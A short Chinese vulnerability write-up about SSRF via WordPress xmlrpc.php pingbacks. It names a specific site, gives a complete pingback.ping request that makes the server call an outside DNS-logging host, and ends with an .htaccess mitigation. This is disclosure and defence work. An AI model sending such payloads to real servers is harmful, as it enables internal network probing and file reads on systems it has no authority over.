漏洞证明
xmlrpc.php 存在SSRF漏洞 漏洞地址:http://baijie.joowp.com/xmlrpc.php 验证方法:
POST http://baijie.joowp.com/xmlrpc.php
<?xml version=”1.0″ encoding=”iso-8859-1″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://qxotxt.s0x.cn/</string></value></param>
<param><value><string>http://baijie.joowp.com//?p=1</string></value></param>
</params>
</methodCall>
匹配内容:
查询到DNS请求: qxotxt.s0x.cn,说明漏洞存在
造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
3、利用file协议读取本地文件等。
安全建议
通过.htaccess屏蔽xmlrpc.php文件的访问 # protect xmlrpc Order Deny,Allow Deny from all 删除根目录下的xmlrpc.php。
转载请注明:⎛蜗牛建站⎞ » WordPress xmlrpc.php 存在SSRF漏洞